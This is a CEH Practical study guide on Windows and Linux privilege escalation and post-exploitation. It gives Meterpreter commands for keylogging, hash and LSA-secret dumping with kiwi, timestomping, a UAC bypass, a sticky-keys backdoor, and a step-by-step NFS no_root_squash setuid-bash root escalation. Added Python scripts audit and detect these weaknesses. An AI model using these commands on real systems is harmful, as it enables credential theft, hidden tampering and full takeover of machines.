2. Privilege Escalation
Privilege Escalation techniques to learn for CEH Practical
1. Escalate privileges using Priv Esc tools
After you have a meterpreter session, use the following command to check which user the session is running as.
getuid
We can use the BeRoot tool to check for further attack vectors.
Upload it with meterpreter. Files land in the session's current working directory (check with pwd); that is often the user's Downloads folder when the payload was launched from there.
upload beroot.exe
Now run shell and then execute the uploaded file. It will list the attack vectors it finds.

Note: Windows privileges held by the current token can be used to escalate privileges. These include SeDebug, SeRestore & SeBackup & SeTakeOwnership, SeTcb & SeCreateToken, SeLoadDriver, and SeImpersonate & SeAssignPrimaryToken. BeRoot lists all privileges of the token and highlights if you hold one of these. A privilege shown as Disabled is still held and can be enabled by the process, so it counts.
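The same triage by hand, as an added example (not part of the original notes and not BeRoot's code): run `shell` in the session, then `whoami /priv`, and feed the output to this script. It flags the privileges from the note above and says why each one matters. The `whoami /priv` output embedded below is constructed for the example.

```python
# Added example: triage `whoami /priv` output for escalation-relevant privileges.
# The sample output is constructed; the abuse cases are the well-known ones.
import re

# Privilege -> what holding it lets an attacker do.
DANGEROUS = {
    "SeDebugPrivilege": "open/inject into SYSTEM processes, dump LSASS",
    "SeRestorePrivilege": "write files and registry keys regardless of ACLs",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeTakeOwnershipPrivilege": "take ownership of protected files and keys",
    "SeTcbPrivilege": "act as part of the OS, create arbitrary logon tokens",
    "SeCreateTokenPrivilege": "create tokens with any SIDs and privileges",
    "SeLoadDriverPrivilege": "load a kernel driver (kernel code execution)",
    "SeImpersonatePrivilege": "impersonate SYSTEM tokens (Potato-style attacks)",
    "SeAssignPrimaryTokenPrivilege": "start a new process under a stolen token",
}

# Constructed sample of what `whoami /priv` prints for a low-privileged service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeBackupPrivilege             Back up files and directories             Disabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage(text):
    """Return [(name, state, reason)] for every dangerous privilege the token holds.

    Disabled privileges are still reported: the token holds them and a process
    can turn them on with AdjustTokenPrivileges before using them.
    """
    findings = []
    for name, state in parse_privileges(text).items():
        if name in DANGEROUS:
            findings.append((name, state, DANGEROUS[name]))
    return findings


if __name__ == "__main__":
    for name, state, why in triage(SAMPLE_WHOAMI_PRIV):
        print(f"[!] {name:<30} {state:<9} {why}")
```

On the constructed sample the script reports SeImpersonatePrivilege (enabled) and SeBackupPrivilege (disabled, but still held); either one is a complete escalation path on its own, which is exactly what BeRoot highlights.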
Ghostpack Seatbelt
Gather information with following commands
Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc
Dumping hashes in meterpreter (needs SYSTEM; escalate first)
hashdump // if this fails, background the session and try the following module with SESSION set
use post/windows/gather/smart_hashdump
2. Post exploitation using Meterpreter
Useful commands
sysinfo
getuid
ifconfig
pwd // current directory of the session (often the Downloads folder)
ls
cat
cd
keyscan_start // start the keylogger
keyscan_dump // dump the captured keystrokes
idletime
To modify the MACE (Modified, Accessed, Created, Entry-modified) timestamps of a file. -m sets Modified; -a, -c and -e set the others and -z sets all four. The date format is MM/DD/YYYY HH24:MI:SS.
timestomp secret.ext -m "2/11/2022 8:10:03"
To view timestamp entries
timestomp secret.ext -v
Finding files in meterpreter
search -f flag*.txt (in meterpreter)
Hidden files in shell
First get the shell, then use the following command.
dir /a:h
List all services (running and stopped) in shell. Note the space after each = in sc syntax.
sc queryex type= service state= all
Other shell commands
netsh firewall show state // firewall state (old netsh firewall context; still works on current Windows but is deprecated)
netsh firewall show config
wmic cpu get
wmic /node:"" product get name,version,vendor // put the target host name between the quotes; omit /node for the local machine
wmic useraccount get name,sid
wmic os where Primary='TRUE' call reboot // restarts the system

3. Linux privilege esc with pkexec
CVE-2021-4034 (PwnKit)
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). pkexec is setuid root, which is what makes the bug a local root escalation.
Check first that pkexec is installed and still has the setuid bit set (a patched pkexec has it too; the fix is in the binary, so go by the distribution's advisory, not by the presence of the bit). Then download and run the public exploit script; on a vulnerable host it drops you into a root shell.
4. Linux priv esc with NFS misconfiguration
Configure NFS in Victim
sudo apt install nfs-kernel-server
Open the /etc/exports file. It lists the directories to share on the network, each with the allowed clients and options. Add the following entry. The combination of rw and no_root_squash is the misconfiguration: by default NFS squashes root (maps uid 0 on the client to nobody), and no_root_squash turns that off, so root on any client keeps uid 0 on the share.
/home *(rw,no_root_squash)
restart the server
sudo /etc/init.d/nfs-kernel-server restart
If we run the nmap scan now, port 2049 will appear as open.

On the attacking machine
Now install the NFS client utilities
sudo apt install nfs-common
List the shares the target exports
showmount -e 192.168.18.110
Now mount the share
mkdir /tmp/nfs
sudo mount -t nfs 192.168.18.110:/home /tmp/nfs
Now move to the directory
cd /tmp/nfs
sudo cp /bin/bash . // must be done as root so the file is owned by uid 0 on the server (no_root_squash keeps that mapping)
sudo chmod +s bash // sets the setuid and setgid bits, so the binary runs with the owner's (root's) effective uid
ls -la bash // owner should be root and the mode should show rwsr-sr-x
To verify the mount (the share is listed with its free space)
sudo df -h

Now ssh into the machine as the low-privileged user. Move to the shared directory and run the copied bash with -p (privileged mode keeps the effective uid instead of dropping it back to the real user) and we will get the root shell.
cd /home
./bash -p
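The defensive side of the same misconfiguration, as an added example (not part of the original notes): a small audit of /etc/exports that flags every export the attack above works against. It relies on the exportfs defaults (ro, sync, root_squash), so only an explicit no_root_squash is a finding, and only together with rw does it allow planting the setuid bash. The exports text below is constructed for the example.

```python
# Added example: audit /etc/exports for exports that let a root user on a client
# plant a setuid-root binary (rw + no_root_squash). Sample file is constructed.
import re

SAMPLE_EXPORTS = """\
# /etc/exports - constructed sample
/home *(rw,no_root_squash)
/srv/backup 192.168.18.0/24(rw,sync,root_squash)
/srv/pub *(ro)
/srv/data 192.168.18.50(rw,no_root_squash) 192.168.18.0/24(ro)
"""

# A client spec is either "client(opt,opt)" or a bare "client" with default options.
ENTRY_RE = re.compile(r"(\S+?)\((.*?)\)|(\S+)")


def parse_exports(text):
    """Return [(path, [(client, [options]), ...]), ...] for each export line."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        clients = []
        for m in ENTRY_RE.finditer(rest):
            if m.group(1) is not None:
                client, opts = m.group(1), m.group(2).split(",")
            else:  # no option list: exportfs defaults (ro, root_squash) apply
                client, opts = m.group(3), []
            clients.append((client, [o.strip() for o in opts if o.strip()]))
        exports.append((path, clients))
    return exports


def audit(text):
    """Return [(path, client, problem)] for exports usable for the setuid-bash attack."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            if "no_root_squash" not in opts:
                continue  # root_squash is the default: uid 0 becomes nobody
            if "rw" in opts:
                scope = "any host" if client == "*" else client
                findings.append((path, client, f"rw + no_root_squash exported to {scope}"))
            else:
                findings.append((path, client, "no_root_squash on a ro export: unsafe if ever made rw"))
    return findings


def hardened(path, network):
    """Replacement export line: restrict the client range and keep root squashed."""
    return f"{path} {network}(rw,sync,root_squash)"


if __name__ == "__main__":
    for path, client, problem in audit(SAMPLE_EXPORTS):
        print(f"[!] {path} {client}: {problem}")
        print(f"    suggested: {hardened(path, '192.168.18.0/24')}")
```

With root_squash back in place the attacker's `cp` and `chmod +s` still succeed, but the file on the server is owned by nobody, so `./bash -p` only gives a shell as nobody. Adding `nosuid` to the mount on any host that mounts the share, and exporting to a specific network instead of `*`, closes the remaining variants.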
Useful commands post exploitation
id
whoami
cat /etc/crontab // scheduled jobs, another common priv esc vector
find / -name "*.txt" -ls 2>/dev/null // list all text files on the system (quote the glob so the shell does not expand it)
route -n // kernel routing table with numeric addresses (no name lookups)
A setuid editor works the same way: on the attacking machine copy nano to the share as root and set the setuid bit on it exactly as for bash, then open the shadow file with it on the target. (From the root shell obtained above you can of course just read /etc/shadow directly.)
sudo cp /bin/nano .
./nano /etc/shadow
To see running processes
ps -ef
To list setuid binaries (another common priv esc vector)
find / -perm -4000 -type f -ls 2>/dev/null
5. Escalate privileges bypassing UAC and sticky keys
After you have a meterpreter session as a user who is in the local Administrators group (if not, there is no UAC to bypass), background it and then use the following exploit, with SESSION set to the backgrounded session.
use exploit/windows/local/bypassuac_fodhelper
Then, once you get a new (high-integrity) meterpreter session, use the following command to get SYSTEM
getsystem -t 1 // technique 1: named pipe impersonation
To list the current sessions use the following command; sessions -i followed by the id interacts with one.
sessions -l
Using sticky keys to priv esc on Win 11
After the initial meterpreter session has been escalated (the module needs an admin/SYSTEM session), use the following module.
use post/windows/manage/sticky_keys
Now set the SESSION option to the already escalated session and run it.
Now on Windows 11, sign in as a normal user (or stay at the logon screen) and press Shift five times. Because sethc.exe has been hooked, a command prompt opens instead of the sticky keys dialog; triggered from the logon screen it runs as SYSTEM.
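Detecting what the sticky_keys module leaves behind, as an added example (not part of the original notes and not the module's code). The module works by setting the Debugger value under Image File Execution Options for an accessibility binary such as sethc.exe, so Windows starts cmd.exe whenever that binary is launched. This script parses the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` and reports any accessibility binary with a Debugger set; the reg query output below is constructed for the example.

```python
# Added example: find IFEO "Debugger" hijacks of accessibility binaries
# (the sticky keys backdoor). The reg query output below is constructed.
import re

# Binaries reachable from the logon/lock screen via Ease of Access hotkeys.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}

SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllHost.exe
    MitigationOptions    REG_QWORD    0x100000000000

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\Windows\System32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe
    MitigationOptions    REG_QWORD    0x100

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myapp.exe
    Debugger    REG_SZ    "C:\Program Files\Debugger\windbg.exe"
"""

# A value line: indented name, REG_* type, then the data.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_ifeo(text):
    """Return {image_name_lower: {value_name: data}} from `reg query ... /s` output."""
    entries, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            # Subkey name (the image file name) is the last path component.
            current = line.rstrip("\\").rsplit("\\", 1)[-1].lower()
            entries.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            entries[current][m.group(1)] = m.group(3).strip()
    return entries


def find_sticky_keys_backdoors(text):
    """Return [(image, debugger)] for accessibility binaries that have a Debugger value."""
    hits = []
    for image, values in parse_ifeo(text).items():
        debugger = values.get("Debugger")
        if debugger and image in ACCESSIBILITY_BINARIES:
            hits.append((image, debugger))
    return hits


if __name__ == "__main__":
    for image, debugger in find_sticky_keys_backdoors(SAMPLE_REG_QUERY):
        print(f"[!] {image} is hijacked: Debugger = {debugger}")
```

A Debugger value on other images (myapp.exe in the sample) is normal developer usage and is not reported; a Debugger on any of the accessibility binaries has no legitimate reason and should be removed with `reg delete` on that key's Debugger value. The same check is worth running after a pentest to confirm the module's changes were reverted.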
6. Priv esc using Mimikatz
Metasploit has a built-in mimikatz extension for meterpreter called kiwi.
First get a meterpreter session and escalate privileges (e.g. bypassuac followed by getsystem); kiwi needs SYSTEM to read LSASS and the SAM.
In meterpreter load the extension
load kiwi
help kiwi // list the kiwi commands

To dump the local SAM hashes
lsa_dump_sam
We can also dump LSA secrets using the following command. LSA secrets are used by the local security policy and may contain service account passwords, cached credentials, IE passwords, SQL passwords etc.
lsa_dump_secrets
Change a user's password with kiwi when you know either the current password (-p) or only its NTLM hash (-n), without ever learning the plaintext in the second case. -P is the new password.
password_change -u raj -p 123 -P 9876
password_change -u raj -n <NTLM-hash> -P 1234